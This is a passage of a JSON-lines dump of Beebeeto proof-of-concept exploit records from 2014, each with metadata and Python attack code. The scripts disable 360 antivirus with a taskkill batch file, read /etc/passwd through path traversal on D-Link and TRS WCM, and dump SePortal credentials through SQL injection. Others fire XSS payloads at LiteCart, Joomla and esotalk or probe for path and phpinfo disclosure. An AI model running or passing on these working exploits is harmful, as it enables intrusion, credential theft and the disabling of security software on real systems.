\u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n \u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002\r\n\r\n ''',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-078641',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n payload = '''\r\n@echo off\r\n\r\nchkdsk /x e:\r\n\r\ntaskkill /F /IM 360tray.exe /T\r\n'''\r\n # write\r\n test_bat = open('./360-taskkill.bat', 'w')\r\n test_bat.write(payload)\r\n test_bat.close()\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok, file: ./360-taskkill.bat'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wooyun Author zhuixing:\r\n\u6d4b\u8bd5\u4f7f\u7528Windows XP SP3\uff0cVMware Workstation 10.0.3\u3002\r\n\u7ecf\u6d4b\u8bd5\uff0c\u5982\u679c360\u5b89\u5168\u536b\u58eb\uff08\u5176\u5b9e\u4e0d\u6b62360\u4e00\u5bb6\uff09\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8(360\u81ea\u8eab\u9ed8\u8ba4\u5b89\u88c5\u5728\u975e\u7cfb\u7edf\u76d8\uff09\uff0c\r\n\u7136\u540e\u5bf9\u5176\u6240\u5728\u76d8\u7b26\u8fdb\u884cchkdsk /x \u64cd\u4f5c\uff0c\u5176\u4e3b\u9632\u8fdb\u7a0b360tray.exe\u4f1a\u81ea\u52a8\u5f3a\u884c\u9000\u51fa\uff0c\u4ece\u800c\u5b8c\u5168\u5931\u53bb\u4fdd\u62a4\u80fd\u529b\u3002", "app_name": "360", "id": "poc-2014-0152", "layer4_protocol": null}
{"create_date": "2014-11-19 11:14:22", "name": "D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "D-Link\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/cgi-bin/sddownload.cgi,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0149',\r\n 'name': 'D-Link DCS-2103 /cgi-bin/sddownload.cgi \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'D-Link',\r\n 'vul_version': 'DCS-2103',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['D-Link\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/cgi-bin/sddownload.cgi', 'cgi'],\r\n 'desc': '''\r\n Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model \r\n with other firmware versions also must be vulnerable.\r\n\r\n I found these vulnerabilities at 11.07.2014 and later informed D-Link. But \r\n they haven't answered. It looks like they are busy with fixing \r\n vulnerabilities in DAP-1360, which I wrote about earlier.\r\n ''',\r\n 'references': ['http://www.intelligentexploit.com/view-details.html?id=20197',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/cgi-bin/sddownload.cgi?file=/../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['passwd'] = content\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Vulnerable is the next model: D-Link DCS-2103, Firmware 1.0.0. This model with other firmware versions also must be vulnerable.\r\nI found these vulnerabilities at 11.07.2014 and later informed D-Link. But they haven't answered. It looks like they are busy with fixing vulnerabilities in DAP-1360, which I wrote about earlier.", "app_name": "D-LINK", "id": "poc-2014-0149", "layer4_protocol": null}
{"create_date": "2014-11-18 10:26:00", "name": "Safari 8.0 / OS X 10.10 - Crash POC", "level": "\u4f4e\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 2, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Safari\u6f0f\u6d1e,Crash PoC", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0146',\r\n 'name': 'Safari 8.0 / OS X 10.10 - Crash POC',\r\n 'author': '\u96f7\u8702',\r\n 'create_date': '2014-11-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [10000],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Safari',\r\n 'vul_version': ['8.0'],\r\n 'type': 'Other',\r\n 'tag': ['Safari\u6f0f\u6d1e', 'Crash PoC'],\r\n 'desc': 'N/A',\r\n 'references': ['http://1337day.com/exploit/22884',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n if args['options']['verbose']:\r\n print '[*] Generation'\r\n temp = '''\r\n <!DOCTYPE html>\r\n <head>\r\n <style>\r\n svg {\r\n padding-top: 1337%;\r\n box-sizing: border-box;\r\n }\r\n </style>\r\n </head>\r\n <body>\r\n <svg viewBox=\"0 0 500 500\" width=\"500\" height=\"500\">\r\n <polyline points=\"1 1,2 2\"></polyline>\r\n </svg>\r\n </body>\r\n </html>\r\n '''\r\n print '[*] Copy code: ' + temp\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A --- Crash Crash Crash", "app_name": "Safari", "id": "poc-2014-0146", "layer4_protocol": null}
{"create_date": "2014-11-08 18:34:55", "name": "SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit", "level": "\u4e2d\u5371", "batchable": 1, "author": "\u5c0f\u9a6c\u7532", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SePortal\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/poll.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0141',\r\n 'name': 'SePortal 2.4 /poll.php SQL\u6ce8\u5165\u6f0f\u6d1e POC & Exploit',\r\n 'author': '\u5c0f\u9a6c\u7532',\r\n 'create_date': '2014-11-08',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'SePortal',\r\n 'vul_version': ['2.4'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['SePortal\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/poll.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://sebug.net/vuldb/ssvid-8867',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n if u_p:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = ('1\\'%20union%20select%201,convert(concat_ws(0x3a3a,0x3A3A33763537,user_name,user_password,'\r\n '0x616536393A3A)+using+latin1),1,1,1,1,1,1,1,1%20from%20seportal_users%20limit%201,1--%20z')\r\n verify_url = args['options']['target'] + '/poll.php?poll_id=' + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n u_p = re.findall('::3v57::(.*?)::(.*?)::ae69::', content)\r\n if u_p:\r\n (username,password) = u_p[0]\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['DBInfo'] = {}\r\n args['poc_ret']['DBInfo']['Username'] = username\r\n args['poc_ret']['DBInfo']['Password'] = password\r\n return args\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0141", "layer4_protocol": null}
{"create_date": "2014-11-07 13:07:10", "name": "LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "LiteCart\u6f0f\u6d1e,XSS\u6f0f\u6d1e,/search.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0139',\r\n 'name': 'LiteCart 1.1.2.1 /search.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-07',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'LiteCart',\r\n 'vul_version': ['1.1.2.1'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['LiteCart\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', '/search.php', 'php'],\r\n 'desc': '''\r\n Several cross-site scripting vulnerabilities where discovered in LiteCart,\r\n an open source project that allows you to create a e-commerce sites.\r\n ''',\r\n 'references': ['https://www.netsparker.com/xss-vulnerabilities-in-litecart/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '''/search.php?query='\"--></style></scRipt><scRipt>alert(0x0000C0)</scRipt>'''\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '<scRipt>alert(0x0000C0)</scRipt>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Several cross-site scripting vulnerabilities where discovered in LiteCart, an open source project that allows you to create a e-commerce sites.", "app_name": "LiteCart", "id": "poc-2014-0139", "layer4_protocol": null}
{"create_date": "2014-11-05 15:23:45", "name": "Esotalk topic xss vulnerability POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Evi1m0", "rank": 3, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "esotalk\u6f0f\u6d1e,xss,topic xss vul,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0137',\r\n 'name': 'Esotalk topic xss vulnerability POC',\r\n 'author': 'evi1m0',\r\n 'create_date': '2014-11-05',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'esotalk',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Cross Site Request Forgery',\r\n 'tag': ['esotalk\u6f0f\u6d1e', 'xss', 'topic xss vul', 'php'],\r\n 'desc': 'esotalk topic xss vul.',\r\n 'references': ['http://www.hackersoul.com/post/ff0000-hsdb-0006.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n temp = '''\r\n [url=[img]onmouseover=alert(document.cookie);//://example.com/image.jpg#\"aaaaaa[/img]]evi1m0[/url]\r\n '''\r\n print '[*] Copy code: ' + temp\r\n print '[*] Specific use: ' + str(MyPoc.poc_info['vul']['references'])\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = 'Generation ok'\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "esotalk topic xss vul.", "app_name": "esotalk", "id": "poc-2014-0137", "layer4_protocol": null}
{"create_date": "2014-11-01 17:25:13", "name": "Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "cmstop\u4fe1\u606f\u6cc4\u9732,cmstop\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0135',\r\n 'name': 'Cmstop 1.0 /apps/system/view/template/edit.php Path Disclosure POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'cmstop',\r\n 'vul_version': ['1.0'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['cmstop\u4fe1\u606f\u6cc4\u9732', 'cmstop\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/n/56',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/cmstop/apps/system/view/template/edit.php',\r\n '/apps/system/view/template/edit.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n m = re.search(' in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "CMSTOP", "id": "poc-2014-0135", "layer4_protocol": null}
{"create_date": "2014-11-01 17:18:56", "name": "Wordpress full Path Disclosure Vulnerability POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Wordpress\u4fe1\u606f\u6cc4\u9732,Wordpress\u7206\u8def\u5f84,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0134',\r\n 'name': 'Wordpress full Path Disclosure Vulnerability POC',\r\n 'author': 'foundu',\r\n 'create_date': '2014-11-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Wordpress\u4fe1\u606f\u6cc4\u9732', 'Wordpress\u7206\u8def\u5f84', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['https://www.yascanner.com/#!/n/53',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/wp-includes/registration-functions.php',\r\n '/wp-includes/registration.php',\r\n '/wp-includes/user.php',\r\n '/wp-includes/rss-functions.php',]\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n m = re.search('</b>:[^\\r\\n]+ in <b>([^<]+)</b> on line <b>(\\d+)</b>', content)\r\n if m:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6548\u679c\u8fd8\u4e0d\u9519", "app_name": "WordPress", "id": "poc-2014-0134", "layer4_protocol": null}
{"create_date": "2014-10-31 11:01:33", "name": "TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "wangjianyu", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "TRS wcm\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/wcm/app/system/read_image.jsp,jsp", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0131',\r\n 'name': 'TRS wcm\u7cfb\u7edf /wcm/app/system/read_image.jsp \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'wangjianyu',\r\n 'create_date': '2014-10-31',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'TRS WCM',\r\n 'vul_version': '*',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['TRS wcm\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/wcm/app/system/read_image.jsp', 'jsp'],\r\n 'desc': 'N/A',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-061225',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wcm/app/system/read_image.jsp?filename=../../../../../../../../../../../../../../../../../etc/passwd'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"root:\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "TRS", "id": "poc-2014-0131", "layer4_protocol": null}
{"create_date": "2014-10-30 16:03:18", "name": "Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "user1018", "rank": 2, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "Shopex\u4fe1\u606f\u6cc4\u9732,phpinfo\u6cc4\u9732,php,svinfo.php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0129',\r\n 'name': 'Shopex /svinfo.php phpinfo\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'user1018',\r\n 'create_date': '2014-10-30',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Shopex',\r\n 'vul_version': ['*'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['Shopex\u4fe1\u606f\u6cc4\u9732', 'phpinfo\u6cc4\u9732', 'php', 'svinfo.php'],\r\n 'desc': '''\r\n http://sitename/app/dev/svinfo.php?phpinfo=true\r\n http://sitename/app/dev/svinfo.php?download=true\r\n http://sitename/install/svinfo.php?phpinfo=true\r\n ''',\r\n 'references': ['N/A',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_list = ['/app/dev/svinfo.php?phpinfo=true',\r\n '/install/svinfo.php?phpinfo=true',\r\n '/app/dev/svinfo.php?download=true']\r\n args['poc_ret']['file_path'] = []\r\n for filename in file_list:\r\n verify_url = args['options']['target'] + filename\r\n try:\r\n if args['options']['verbose']:\r\n print '[*] Requst URL: ' + verify_url\r\n req = urllib2.urlopen(verify_url)\r\n content = req.read()\r\n except:\r\n continue\r\n if 'ShopEx' in content and 'MySQL' in content:\r\n args['success'] = True\r\n args['poc_ret']['file_path'].append(verify_url)\r\n if not args['poc_ret']['file_path']:\r\n args['poc_ret'].pop('file_path')\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "http://sitename/app/dev/svinfo.php?phpinfo=true\r\nhttp://sitename/app/dev/svinfo.php?download=true\r\nhttp://sitename/install/svinfo.php?phpinfo=true", "app_name": "ShopEx", "id": "poc-2014-0129", "layer4_protocol": null}
{"create_date": "2014-10-29 13:31:40", "name": "Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "Joomla\u6f0f\u6d1e,XSS\u6f0f\u6d1e,BeaconDecode,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0126',\r\n 'name': 'Joomla BeaconDecode \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-10-29',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Joomla',\r\n 'vul_version': ['*'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['Joomla\u6f0f\u6d1e', 'XSS\u6f0f\u6d1e', 'BeaconDecode', 'php'],\r\n 'desc': 'Vulnerable File: index.php?option=com_beacondecode&task=',\r\n 'references': ['https://www.yascanner.com/#!/x/19498',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/index.php?option=com_beacondecode&task=\"/><script>alert(233)</script>'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '\"/><script>alert(233)</script>' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = 